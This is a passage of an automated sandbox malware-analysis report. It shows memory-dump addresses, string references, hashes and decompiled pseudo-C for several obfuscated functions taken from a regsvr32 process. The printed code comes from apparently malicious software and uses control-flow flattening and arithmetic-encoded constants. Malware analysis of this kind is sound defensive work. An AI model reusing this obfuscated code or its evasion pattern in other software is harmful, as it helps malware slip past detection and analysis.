0x003df06f
0x003df073
0x003df078
0x003df09a
0x003df09c
0x003df09f
0x003df0a1
0x003df0a7
0x003df0ab
0x00000000
0x003df0ab
0x003def24
0x003def29
0x003deffa
0x00000000
0x003def2f
0x003def34
0x00000000
0x003def3a
0x003def3a
0x003def44
0x003def4c
0x003def54
0x003def5c
0x003def64
0x003def6c
0x003def78
0x003def79
0x003def7d
0x003def85
0x003def8d
0x003def9a
0x003defa2
0x003defaa
0x003defb2
0x003defc0
0x003defc4
0x003defcc
0x003defe5
0x003defea
0x003def34
0x003def29
0x003def1e
0x003def13
0x003deff0
0x003deff9
0x003deff9
0x003df2d4
0x003df2e5
0x003df2e6
0x003df2ea
0x003df2f2
0x003df2fa
0x003df302
0x003df30a
0x003df318
0x003df31c
0x003df324
0x003df32c
0x003df334
0x003df33c
0x003df344
0x003df34c
0x003df351
0x003df36e
0x003df381
0x003df382
0x003df383
0x003df384
0x003df385
0x003df391
0x003df393
0x003df39d
0x003df3a5
0x003df3ad
0x003df3bb
0x003df3bf
0x003df3c8
0x003df3cc
0x003df3d4
0x003df3dc
0x003df3e1
0x003df3e9
0x003df3e9
0x003df3e9
0x003df3fd
0x003df402
0x003df406
0x003df409
0x003df40e
0x003df413
0x003df413
0x003df413
0x00000000
0x003df41e

Strings

Z-L, xrefs: 003DEF85
dd+, xrefs: 003DF02A
%!03, xrefs: 003DF32C

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: %!03$Z-L$dd+
API String ID: 0-3524342076
Opcode ID: e297041a5091ceb19d8f96b933c4e8c92e4e473c0c685f54fe55753a0d9f2218
Instruction ID: 509a2ecb29b48320f31d4c999ef62e516c5268b628b8a1955ff029e130122369
Opcode Fuzzy Hash: e297041a5091ceb19d8f96b933c4e8c92e4e473c0c685f54fe55753a0d9f2218
Instruction Fuzzy Hash: F1D102711093428FC349CF25D58990BBBE1BBC8758F104A2DF4D6AA261C3B4DA49CF97

Uniqueness

Uniqueness Score: -1.00%

Function 003DA455 Relevance: 4.0, Strings: 3, Instructions: 259
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E003DA455(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _v60;
				char _v68;
				char _v72;
				char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				char _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void* _t254;
				void* _t256;
				void* _t259;
				intOrPtr _t281;
				void* _t292;
				signed int _t293;
				signed int _t295;
				signed int _t296;
				signed int _t297;
				signed int _t298;
				signed int _t301;
				signed int _t303;
				char _t326;
				signed int* _t329;

				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(0);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003C2528(_t254);
				_v88 = 0;
				_t329 =  &(( &_v136)[0xa]);
				_v84 = 0x6ab57;
				_t326 = 0;
				_v80 = 0xdf6a4;
				_t256 = 0xc2c5e;
				_v76 = 0;
				_v72 = 0;
				do {
					while(_t256 != 0x1fbe3) {
						if(_t256 == 0x5d4f5) {
							_v128 = 0xc2aa01;
							_v128 = _v128 + 0xed25;
							_v128 = _v128 ^ 0x00c0772d;
							_v136 = 0x2f90e4;
							_v136 = _v136 ^ 0xeb71412c;
							_v136 = _v136 + 0xffff4957;
							_v136 = _v136 ^ 0x4f886549;
							_v136 = _v136 ^ 0xa4dcc148;
							_t259 = E003CB70D(_a20,  &_v88, _a20, _v128, _v136);
							_t329 =  &(_t329[3]);
							if(_t259 != 0) {
								_t256 = 0x63110;
								continue;
							}
						} else {
							if(_t256 == 0x63110) {
								_v136 = 0x57163b;
								_v136 = _v136 | 0xe9496680;
								_v136 = _v136 + 0xcd74;
								_v136 = _v136 ^ 0xe96bd0e2;
								_v132 = 0x368bdc;
								_v132 = _v132 * 0x69;
								_v132 = _v132 ^ 0x165e7133;
								_push(_v132);
								_push( &_v68);
								_t292 = 0x44;
								E003D2AEF(_t292, _v136);
								_v68 = 0x44;
								_v136 = 0x159642;
								_v136 = _v136 | 0x5d1cdcaa;
								_t293 = 0x7d;
								_v136 = _v136 * 0x45;
								_v136 = _v136 ^ 0x190e5d57;
								_v124 = 0x9e3c7a;
								_v124 = _v124 + 0xffffd209;
								_v124 = _v124 / _t293;
								_v124 = _v124 * 0x6d;
								_v124 = _v124 ^ 0x00812469;
								_v120 = 0x4fc043;
								_v120 = _v120 + 0xffff298f;
								_v120 = _v120 ^ 0x004c8dab;
								_v132 = 0xe2f621;
								_v132 = _v132 + 0xffffdb61;
								_v132 = _v132 ^ 0x00e557cb;
								_v60 = E003CD933(_v136, _v124, 0x3c1908, _v120, _v132);
								_v136 = 0xba4469;
								_v136 = _v136 >> 4;
								_v136 = _v136 | 0xffb57d3f;
								_v136 = _v136 ^ 0xffbff97f;
								_v112 = 0x1774a0;
								_v112 = _v112 << 1;
								_v112 = _v112 ^ 0x1cbdba13;
								_v112 = _v112 + 0x8038;
								_v112 = _v112 ^ 0x1c93d3ab;
								_v132 = 0x7a7b18;
								_t295 = 0x5c;
								_v132 = _v132 * 0x43;
								_v132 = _v132 | 0xae86dcdb;
								_v132 = _v132 ^ 0xae8d3139;
								_v128 = 0x471b58;
								_v128 = _v128 ^ 0xd4f35363;
								_v128 = _v128 ^ 0xd4baed23;
								_v116 = 0x4745c;
								_v116 = _v116 + 0x14ef;
								_v116 = _v116 ^ 0x000a54b6;
								_v104 = 0x2fd6da;
								_v104 = _v104 / _t295;
								_v104 = _v104 * 0x3a;
								_v104 = _v104 * 0x4c;
								_v104 = _v104 ^ 0x08fcf067;
								_v108 = 0x947553;
								_v108 = _v108 << 7;
								_v108 = _v108 * 0x58;
								_t296 = 6;
								_v108 = _v108 / _t296;
								_v108 = _v108 ^ 0x16019e39;
								_v92 = 0xc4633;
								_t297 = 0x3c;
								_v92 = _v92 / _t297;
								_v92 = _v92 ^ 0x00036757;
								_v120 = 0x7dbc4a;
								_v120 = _v120 + 0xfe94;
								_v120 = _v120 << 3;
								_v120 = _v120 ^ 0x03f75ecb;
								_v124 = 0x7110dc;
								_v124 = _v124 ^ 0x541b4432;
								_t298 = 0x47;
								_v124 = _v124 / _t298;
								_v124 = _v124 >> 0xb;
								_v124 = _v124 ^ 0x000c6166;
								_v96 = 0x30c07;
								_v96 = _v96 ^ 0xa08c52d2;
								_v96 = _v96 ^ 0xa0869f21;
								_v100 = 0x449e8e;
								_v100 = _v100 + 0x59df;
								_v100 = _v100 + 0x8994;
								_v100 = _v100 ^ 0x004b21d5;
								_t281 = E003DDB83(_v112 | _v136, _a4, _v88, _a24, _v132, _t298, _v128, _v116, _v104, _t298, _v108, _t298, _t298, _v92, _a20, _v120, 0, _v124,  &_v68, _v96, _v100);
								_v132 = 0x24d74b;
								_t326 = _t281;
								_t301 = 0x27;
								_v132 = _v132 / _t301;
								_v132 = _v132 * 0x77;
								_v132 = _v132 ^ 0x007f474c;
								_v136 = 0xa56f67;
								_t303 = 0x23;
								_v136 = _v136 / _t303;
								_v136 = _v136 * 0xf;
								_v136 = _v136 | 0xfb79520b;
								_v136 = _v136 ^ 0xfb7f77d0;
								_v128 = 0xb3fec6;
								_v128 = _v128 << 0xe;
								_v128 = _v128 ^ 0xffb6526d;
								E003C43D3(_v132, _v136, _v128, _v60);
								_t329 =  &(_t329[0x1a]);
								_t256 = 0x1fbe3;
								continue;
							} else {
								if(_t256 != 0xc2c5e) {
									goto L10;
								} else {
									_t256 = 0x5d4f5;
									continue;
								}
							}
						}
						goto L11;
					}
					_v116 = 0x4278dc;
					_v116 = _v116 | 0xae7a6b5e;
					_v116 = _v116 ^ 0xae700202;
					_v128 = 0x97d152;
					_v128 = _v128 + 0xffff8b83;
					_v128 = _v128 ^ 0x009c1172;
					_v136 = 0x22b29d;
					_v136 = _v136 >> 9;
					_v136 = _v136 >> 3;
					_v136 = _v136 + 0xffffef6b;
					_v136 = _v136 ^ 0xfffab434;
					E003C7150(_v116, _v128, _v88, _v136);
					_t256 = 0x5ab7f;
					L10:
				} while (_t256 != 0x5ab7f);
				L11:
				return _t326;
			}

0x003da461
0x003da462
0x003da469
0x003da470
0x003da477
0x003da478
0x003da47f
0x003da486
0x003da48d
0x003da48e
0x003da48f
0x003da494
0x003da498
0x003da49b
0x003da4a3
0x003da4a5
0x003da4ad
0x003da4b2
0x003da4bb
0x003da4c4
0x003da4c4
0x003da4d1
0x003da861
0x003da86d
0x003da875
0x003da87d
0x003da885
0x003da88d
0x003da895
0x003da89d
0x003da8b5
0x003da8ba
0x003da8bf
0x003da8c5
0x00000000
0x003da8c5
0x003da4d7
0x003da4d9
0x003da4ea
0x003da4f2
0x003da4fa
0x003da502
0x003da50a
0x003da517
0x003da51f
0x003da527
0x003da52f
0x003da532
0x003da533
0x003da538
0x003da542
0x003da54a
0x003da559
0x003da55a
0x003da55e
0x003da566
0x003da56e
0x003da57c
0x003da585
0x003da589
0x003da591
0x003da599
0x003da5a1
0x003da5a9
0x003da5b1
0x003da5b9
0x003da5db
0x003da5e2
0x003da5ec
0x003da5f1
0x003da5f9
0x003da601
0x003da609
0x003da60d
0x003da615
0x003da61d
0x003da625
0x003da634
0x003da635
0x003da639
0x003da641
0x003da649
0x003da651
0x003da659
0x003da661
0x003da669
0x003da671
0x003da679
0x003da687
0x003da690
0x003da699
0x003da69d
0x003da6a5
0x003da6ad
0x003da6b7
0x003da6c3
0x003da6c8
0x003da6ce
0x003da6d6
0x003da6e2
0x003da6e7
0x003da6ed
0x003da6f5
0x003da6fd
0x003da705
0x003da70a
0x003da712
0x003da71a
0x003da726
0x003da730
0x003da738
0x003da73d
0x003da745
0x003da74d
0x003da755
0x003da75d
0x003da765
0x003da76d
0x003da775
0x003da7c8
0x003da7cd
0x003da7d5
0x003da7df
0x003da7e4
0x003da7ef
0x003da7f3
0x003da7fb
0x003da807
0x003da80a
0x003da813
0x003da817
0x003da81f
0x003da827
0x003da82f
0x003da834
0x003da84f
0x003da854
0x003da857
0x00000000
0x003da4db
0x003da4e0
0x00000000
0x003da4e6
0x003da4e6
0x00000000
0x003da4e6
0x003da4e0
0x003da4d9
0x00000000
0x003da4d1
0x003da8cc
0x003da8d4
0x003da8dc
0x003da8e4
0x003da8ec
0x003da8f4
0x003da8fc
0x003da904
0x003da909
0x003da90e
0x003da916
0x003da92e
0x003da935
0x003da93a
0x003da93a
0x003da946
0x003da951

Strings

D, xrefs: 003DA538
%, xrefs: 003DA86D
,Aq, xrefs: 003DA885

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: %$,Aq$D
API String ID: 0-3721636736
Opcode ID: 115e90e4c94a5fa5171c05a9e1d007d8887c9a381fce889e5d8a6df9d26d6d15
Instruction ID: 7c5f25f366bb789b71032b6efeb89d5dc389ca1a6c0062c49bcf6bfacb915dd7
Opcode Fuzzy Hash: 115e90e4c94a5fa5171c05a9e1d007d8887c9a381fce889e5d8a6df9d26d6d15
Instruction Fuzzy Hash: A8D10F715083819FC355CF61D94990BBBE2FBC8748F508A1EF19996260D7B5CA09CB87

Uniqueness

Uniqueness Score: -1.00%

Function 003CF88D Relevance: 4.0, Strings: 3, Instructions: 243
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E003CF88D(void* __ecx, void* __edx) {
				char _v520;
				char _v1040;
				signed int _v1044;
				intOrPtr _v1048;
				unsigned int _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				void* _t244;
				intOrPtr _t245;
				void* _t257;
				intOrPtr _t263;
				signed int _t287;
				signed int _t290;
				signed int _t291;
				signed int _t293;
				signed int _t295;
				signed int _t296;
				intOrPtr _t309;
				signed int* _t327;

				_t327 =  &_v1064;
				_v1044 = _v1044 & 0x00000000;
				_t244 = 0x162e7;
				_v1048 = 0x361d7;
				L1:
				while(_t244 != 0x162e7) {
					if(_t244 == 0x45dae) {
						_v1064 = 0x3598c8;
						_v1064 = _v1064 ^ 0x7b3840c4;
						_v1064 = _v1064 + 0xffff14d5;
						_v1064 = _v1064 << 2;
						_v1064 = _v1064 ^ 0xec395bde;
						_v1060 = 0xb118ad;
						_v1060 = _v1060 << 4;
						_v1060 = _v1060 ^ 0x0b1fc8cf;
						_v1056 = 0x5ddfa4;
						_v1056 = _v1056 | 0x7152fa98;
						_v1056 = _v1056 ^ 0x7157a399;
						 *((short*)(E003D7C07( &_v1040, _v1064, _v1060, _v1056))) = 0;
						_v1056 = 0xb2a00f;
						_v1056 = _v1056 + 0x2380;
						_v1056 = _v1056 ^ 0x58983c27;
						_v1056 = _v1056 ^ 0x5827f9c6;
						_v1052 = 0xc1be73;
						_v1052 = _v1052 << 0xd;
						_v1052 = _v1052 * 0x7d;
						_v1052 = _v1052 ^ 0x3fced5db;
						_v1060 = 0x3afc61;
						_v1060 = _v1060 + 0x84d7;
						_v1060 = _v1060 * 0x63;
						_v1060 = _v1060 << 4;
						_v1060 = _v1060 ^ 0x702732c4;
						_v1064 = 0x9d2a80;
						_v1064 = _v1064 << 7;
						_v1064 = _v1064 * 0x60;
						_v1064 = _v1064 + 0xffff9747;
						_t238 =  &_v1064;
						 *_t238 = _v1064 ^ 0x77fb665c;
						__eflags =  *_t238;
						_t244 = E003D5153(_v1056,  &_v1040, _v1052, _v1060, _v1064);
					} else {
						if(_t244 == 0x7b684) {
							_v1056 = 0x81ab09;
							_v1056 = _v1056 + 0xffff847f;
							_v1056 = _v1056 ^ 0x00831cc3;
							_v1064 = 0x3729c6;
							_v1064 = _v1064 | 0x681b67d0;
							_v1064 = _v1064 * 5;
							_v1064 = _v1064 ^ 0x093dcf41;
							E003D815D( &_v520, _v1056, _v1064);
							_v1064 = 0x845461;
							_v1064 = _v1064 << 8;
							_v1064 = _v1064 + 0xffff2cff;
							_t287 = 0x11;
							_v1064 = _v1064 / _t287;
							_v1064 = _v1064 ^ 0x07cdb4e5;
							_v1060 = 0x76ebb8;
							_v1060 = _v1060 * 0x69;
							_v1060 = _v1060 + 0xa8b0;
							_v1060 = _v1060 ^ 0x30c8ebf1;
							E003C3F40( &_v520, __eflags,  &_v1040, _v1060);
							_t327 =  &(_t327[3]);
							_t244 = 0x45dae;
							continue;
						} else {
							if(_t244 == 0xb8f44) {
								_v1064 = 0x9b4e76;
								_v1064 = _v1064 >> 0xd;
								_v1064 = _v1064 << 0x10;
								_v1064 = _v1064 | 0xcfe76148;
								_v1064 = _v1064 ^ 0xcff77f24;
								_v1060 = 0x3ea3f9;
								_v1060 = _v1060 | 0xa64c0bd6;
								_v1060 = _v1060 + 0xf61;
								_v1060 = _v1060 | 0x647ecb4c;
								_v1060 = _v1060 ^ 0xe675193f;
								_v1052 = 0x95a2c2;
								_v1052 = _v1052 + 0x8017;
								_v1052 = _v1052 >> 7;
								_v1052 = _v1052 << 5;
								_v1052 = _v1052 ^ 0x002f9c5e;
								_v1056 = 0x799fe6;
								_v1056 = _v1056 + 0xffffe70c;
								_v1056 = _v1056 ^ 0x007c3742;
								_t257 = E003CD933(_v1064, _v1060, 0x3c1000, _v1052, _v1056);
								_v1064 = 0x8966ef;
								_v1064 = _v1064 ^ 0x3a244332;
								_t77 =  &_v1064; // 0x3a244332
								_t290 = 0x1c;
								_v1064 =  *_t77 / _t290;
								_v1064 = _v1064 + 0xffffa005;
								_v1064 = _v1064 ^ 0x0215bb44;
								_v1052 = 0x2e6403;
								_v1052 = _v1052 >> 6;
								_v1052 = _v1052 >> 5;
								_v1052 = _v1052 ^ 0x000207c2;
								_v1060 = 0x418dd9;
								_t291 = 0x60;
								_v1060 = _v1060 / _t291;
								_v1060 = _v1060 | 0x1390a352;
								_v1060 = _v1060 ^ 0x13908241;
								_v1056 = 0xb0127a;
								_v1056 = _v1056 | 0x9b989f80;
								_v1056 = _v1056 ^ 0x9bba0359;
								_t263 =  *0x3e2208; // 0x28e510
								_t309 =  *0x3e2208; // 0x28e510
								_t115 = _t309 + 0x1c; // 0x3a0043
								E003D0E90(_t115, __eflags, _t291, _v1052, _v1060, _t263 + 0x22c,  &_v1040, _v1056, _t257);
								_v1060 = 0x636535;
								_v1060 = _v1060 << 0xa;
								_v1060 = _v1060 + 0xffff50cc;
								_v1060 = _v1060 ^ 0x8d978cdb;
								_v1056 = 0xd2aa1c;
								_v1056 = _v1056 ^ 0x1aca8677;
								_v1056 = _v1056 ^ 0x1a1ce63d;
								_v1064 = 0x251ec6;
								_v1064 = _v1064 + 0x897c;
								_t293 = 0x67;
								_v1064 = _v1064 / _t293;
								_v1064 = _v1064 << 0xf;
								_v1064 = _v1064 ^ 0x2ecec621;
								E003C43D3(_v1060, _v1056, _v1064, _t257);
								_t327 =  &(_t327[0xc]);
								_t244 = 0x7b684;
								continue;
							} else {
								if(_t244 == 0xc0ad8) {
									_v1064 = 0x9a8af8;
									_t295 = 0x14;
									_v1064 = _v1064 / _t295;
									_t296 = 0x5f;
									_v1064 = _v1064 / _t296;
									_v1064 = _v1064 ^ 0x0002859d;
									E003C1B3F();
									goto L8;
								} else {
									if(_t244 != 0xfe0bc) {
										L15:
										__eflags = _t244 - 0xbf3d8;
										if(_t244 != 0xbf3d8) {
											continue;
										} else {
										}
									} else {
										_v1064 = 0xf2eeb2;
										_v1064 = _v1064 * 0x6e;
										_v1064 = _v1064 ^ 0x9eba9f12;
										_v1064 = _v1064 ^ 0xf6df0c95;
										_v1052 = 0xc171ad;
										_v1052 = _v1052 >> 0xc;
										_v1052 = _v1052 + 0xd124;
										_v1052 = _v1052 + 0xffffad69;
										_v1052 = _v1052 ^ 0x000e512d;
										E003D0552();
										L8:
										_t244 = 0xb8f44;
										continue;
									}
								}
							}
						}
					}
					L18:
					return _t244;
				}
				_t245 =  *0x3e2208; // 0x28e510
				__eflags =  *(_t245 + 0x18);
				if( *(_t245 + 0x18) == 0) {
					_t244 = 0xc0ad8;
					goto L15;
				} else {
					_t244 = 0xfe0bc;
					goto L1;
				}
				goto L18;
			}

0x003cf88d
0x003cf893
0x003cf898
0x003cf8a1
0x00000000
0x003cf8b8
0x003cf8c8
0x003cfc3f
0x003cfc4b
0x003cfc53
0x003cfc5b
0x003cfc60
0x003cfc68
0x003cfc70
0x003cfc75
0x003cfc7d
0x003cfc85
0x003cfc8d
0x003cfcac
0x003cfcaf
0x003cfcb7
0x003cfcbf
0x003cfcc7
0x003cfccf
0x003cfcd7
0x003cfce1
0x003cfce5
0x003cfced
0x003cfcf5
0x003cfd02
0x003cfd06
0x003cfd0b
0x003cfd13
0x003cfd1b
0x003cfd25
0x003cfd29
0x003cfd31
0x003cfd31
0x003cfd31
0x003cfd49
0x003cf8ce
0x003cf8d3
0x003cfb5b
0x003cfb6a
0x003cfb72
0x003cfb7a
0x003cfb82
0x003cfb8f
0x003cfb93
0x003cfba3
0x003cfba8
0x003cfbb2
0x003cfbb7
0x003cfbc5
0x003cfbcf
0x003cfbd3
0x003cfbdb
0x003cfbe8
0x003cfbf0
0x003cfbf8
0x003cfc09
0x003cfc0e
0x003cfc11
0x00000000
0x003cf8d9
0x003cf8db
0x003cf980
0x003cf988
0x003cf98d
0x003cf992
0x003cf99a
0x003cf9a2
0x003cf9aa
0x003cf9b2
0x003cf9ba
0x003cf9c2
0x003cf9ca
0x003cf9d2
0x003cf9da
0x003cf9df
0x003cf9e4
0x003cf9ec
0x003cf9f4
0x003cf9fc
0x003cfa19
0x003cfa1e
0x003cfa29
0x003cfa33
0x003cfa3b
0x003cfa40
0x003cfa46
0x003cfa4e
0x003cfa56
0x003cfa5e
0x003cfa63
0x003cfa68
0x003cfa70
0x003cfa7c
0x003cfa80
0x003cfa88
0x003cfa90
0x003cfa98
0x003cfaa0
0x003cfaa8
0x003cfab5
0x003cfac8
0x003cfad3
0x003cfad6
0x003cfadb
0x003cfae5
0x003cfaea
0x003cfaf2
0x003cfafa
0x003cfb02
0x003cfb0a
0x003cfb12
0x003cfb1a
0x003cfb28
0x003cfb2b
0x003cfb2f
0x003cfb34
0x003cfb49
0x003cfb4e
0x003cfb51
0x00000000
0x003cf8e1
0x003cf8e3
0x003cf947
0x003cf957
0x003cf95c
0x003cf966
0x003cf969
0x003cf96d
0x003cf979
0x00000000
0x003cf8e5
0x003cf8e7
0x003cfc2f
0x003cfc2f
0x003cfc34
0x00000000
0x00000000
0x003cfc3a
0x003cf8ed
0x003cf8ed
0x003cf8fa
0x003cf8fe
0x003cf906
0x003cf90e
0x003cf916
0x003cf91b
0x003cf923
0x003cf92b
0x003cf93b
0x003cf940
0x003cf940
0x00000000
0x003cf940
0x003cf8e7
0x003cf8e3
0x003cf8db
0x003cf8d3
0x003cfd51
0x003cfd5b
0x003cfd5b
0x003cfc1b
0x003cfc20
0x003cfc24
0x003cfc2d
0x00000000
0x003cfc26
0x003cfc26
0x00000000
0x003cfc26
0x00000000

Strings

2C$:, xrefs: 003CFA33
B7|, xrefs: 003CF9FC
5ec, xrefs: 003CFADB

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 2C$:$5ec$B7|
API String ID: 0-2784129333
Opcode ID: 2aa6062598d4fc4b6a90cd9b55741609fe942bfb1917e90593d87d7d4898130e
Instruction ID: 1a432c91005e7ec51a2c010658b7141d711d5c0af28ceb199f1292c69f5ed050
Opcode Fuzzy Hash: 2aa6062598d4fc4b6a90cd9b55741609fe942bfb1917e90593d87d7d4898130e
Instruction Fuzzy Hash: 02C100B15083428FC359CF24D48994BBBE1FB94748F504E2DF1A59A261D7B4CA5ACF83

Uniqueness

Uniqueness Score: -1.00%

Function 003D0552 Relevance: 3.9, Strings: 3, Instructions: 184
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E003D0552() {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t133;
				signed int _t147;
				void* _t154;
				signed int _t155;
				signed int _t156;
				signed int _t165;
				void* _t171;
				void* _t182;
				signed int _t183;
				intOrPtr _t184;
				intOrPtr* _t185;
				signed int _t186;
				signed int* _t187;

				_t187 =  &_v16;
				_v4 = 0x3d7;
				_t133 = 0xf4282;
				_t186 = _v4;
				_t153 = _v4;
				_t183 = _v4;
				_t182 = 0;
				while(1) {
					L1:
					_t171 = 0x21b30;
					while(1) {
						L2:
						_t154 = 0x5c;
						do {
							L3:
							while(_t133 != 0x13c53) {
								if(_t133 == _t171) {
									_v12 = 0xabda16;
									_v12 = _v12 << 1;
									_v12 = _v12 + 0xffffac5c;
									_v12 = _v12 ^ 0x01567a77;
									_v8 = 0x1ad46e;
									_v8 = _v8 << 1;
									_v8 = _v8 ^ 0x0036d625;
									_v4 = 0x2c0cea;
									_v4 = _v4 ^ 0xf96708d7;
									_v4 = _v4 ^ 0xf94b4780;
									E003D1D3C(_v12, _v8, _t186, _v4);
									_t133 = 0x13c53;
									_t182 =  !=  ? 1 : _t182;
									goto L1;
								} else {
									if(_t133 == 0x3b1fb) {
										_v4 = 0xd17ca4;
										_t165 = 0x5a;
										_v4 = _v4 / _t165;
										_v4 = _v4 ^ 0x000d53e0;
										_v16 = 0xcee99a;
										_v16 = _v16 * 6;
										_v16 = _v16 + 0x3d81;
										_v16 = _v16 ^ 0x04dbe7ae;
										_v12 = 0x1c4465;
										_v12 = _v12 * 0x72;
										_v12 = _v12 | 0x2de42947;
										_v12 = _v12 ^ 0x2df60dd1;
										_t147 = E003D5053(_v16, _v12, _t165, _v4);
										_t153 = _t147;
										_t187 =  &(_t187[3]);
										if(_t147 != 0) {
											_t133 = 0x91e22;
											while(1) {
												L1:
												_t171 = 0x21b30;
												goto L2;
											}
										}
									} else {
										if(_t133 == 0x5a830) {
											_t184 =  *0x3e2208; // 0x28e510
											_t185 = _t184 + 0x22c;
											while( *_t185 != _t154) {
												_t185 = _t185 + 2;
											}
											_t183 = _t185 + 2;
											_t133 = 0x3b1fb;
											continue;
										} else {
											if(_t133 == 0x91e22) {
												_v16 = 0x789d3;
												_v16 = _v16 + 0x285a;
												_v16 = _v16 * 0x12;
												_v16 = _v16 ^ 0x008b872a;
												_v12 = 0x23935a;
												_v12 = _v12 << 0xe;
												_v12 = _v12 * 0x77;
												_v12 = _v12 ^ 0x5fbda422;
												_v4 = 0x145904;
												_v4 = _v4 | 0xc020ede6;
												_v4 = _v4 ^ 0xc03f29bd;
												_v8 = 0x1b6306;
												_v8 = _v8 | 0x07bf867d;
												_v8 = _v8 ^ 0x07b0f27d;
												_t186 = E003D99D4(_v16, _t153, _v12, _v4, _t183, _v8);
												_t187 =  &(_t187[4]);
												_t171 = 0x21b30;
												_t133 =  !=  ? 0x21b30 : 0x98c02;
												L2:
												_t154 = 0x5c;
												continue;
											} else {
												if(_t133 == 0x98c02) {
													_v12 = 0xeb6197;
													_v12 = _v12 ^ 0x16b3dd5c;
													_v12 = _v12 >> 0xe;
													_v12 = _v12 ^ 0x90c2c086;
													_v12 = _v12 ^ 0x90cbc0a9;
													_v16 = 0x678fac;
													_v16 = _v16 + 0xfffff4b6;
													_v16 = _v16 | 0xb884bd3f;
													_v16 = _v16 ^ 0xb8e8eb5f;
													_v4 = 0xabd91b;
													_v4 = _v4 | 0x4d3b5fdb;
													_v4 = _v4 ^ 0x4db6b1f6;
													E003DA952(_v12, _v16, _v4, _t153);
												} else {
													if(_t133 != 0xf4282) {
														goto L20;
													} else {
														_t133 = 0x5a830;
														continue;
													}
												}
											}
										}
									}
								}
								L23:
								return _t182;
							}
							_v4 = 0xe48e5c;
							_v4 = _v4 + 0xffffa548;
							_v4 = _v4 ^ 0x00e8da3c;
							_v16 = 0x259200;
							_t155 = 0x49;
							_v16 = _v16 / _t155;
							_t156 = 0xb;
							_v16 = _v16 * 0x52;
							_v16 = _v16 ^ 0x0025d0a4;
							_v12 = 0x3921f6;
							_v12 = _v12 * 0x36;
							_v12 = _v12 / _t156;
							_v12 = _v12 ^ 0x0114c5ab;
							E003DA952(_v4, _v16, _v12, _t186);
							_t133 = 0x98c02;
							_t171 = 0x21b30;
							_t154 = 0x5c;
							L20:
						} while (_t133 != 0x1c6ae);
						goto L23;
					}
				}
			}

0x003d0552
0x003d0558
0x003d0560
0x003d0565
0x003d0569
0x003d056d
0x003d0572
0x003d0574
0x003d0574
0x003d0574
0x003d0579
0x003d0579
0x003d057b
0x003d057c
0x00000000
0x003d057c
0x003d0589
0x003d0716
0x003d071e
0x003d0722
0x003d072a
0x003d0732
0x003d073a
0x003d073e
0x003d0746
0x003d074e
0x003d0756
0x003d076b
0x003d0777
0x003d077c
0x00000000
0x003d058f
0x003d0594
0x003d068c
0x003d069c
0x003d069f
0x003d06a3
0x003d06ab
0x003d06b8
0x003d06bc
0x003d06c4
0x003d06cc
0x003d06d9
0x003d06dd
0x003d06e5
0x003d06fa
0x003d06ff
0x003d0701
0x003d0706
0x003d070c
0x003d0574
0x003d0574
0x003d0574
0x00000000
0x003d0574
0x003d0574
0x003d059a
0x003d059f
0x003d0669
0x003d066f
0x003d067a
0x003d0677
0x003d0677
0x003d067f
0x003d0682
0x00000000
0x003d05a5
0x003d05aa
0x003d05c9
0x003d05d3
0x003d05e0
0x003d05e4
0x003d05ec
0x003d05f4
0x003d05fe
0x003d0602
0x003d060a
0x003d0612
0x003d061a
0x003d0622
0x003d062a
0x003d0632
0x003d0650
0x003d0652
0x003d065c
0x003d0661
0x003d0579
0x003d057b
0x00000000
0x003d05ac
0x003d05b1
0x003d081a
0x003d0822
0x003d082a
0x003d082f
0x003d0837
0x003d083f
0x003d0847
0x003d084f
0x003d0857
0x003d085f
0x003d0867
0x003d086f
0x003d0884
0x003d05b7
0x003d05bc
0x00000000
0x003d05c2
0x003d05c2
0x00000000
0x003d05c2
0x003d05bc
0x003d05b1
0x003d05aa
0x003d059f
0x003d0594
0x003d088b
0x003d0894
0x003d0894
0x003d0784
0x003d078e
0x003d0796
0x003d079e
0x003d07ac
0x003d07b1
0x003d07bc
0x003d07be
0x003d07c2
0x003d07ca
0x003d07d7
0x003d07e1
0x003d07e5
0x003d07f9
0x003d0802
0x003d0807
0x003d080c
0x003d080d
0x003d080d
0x00000000
0x003d0818
0x003d0579

Strings

Z(, xrefs: 003D05D3
G)-, xrefs: 003D06DD
S, xrefs: 003D06A3

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

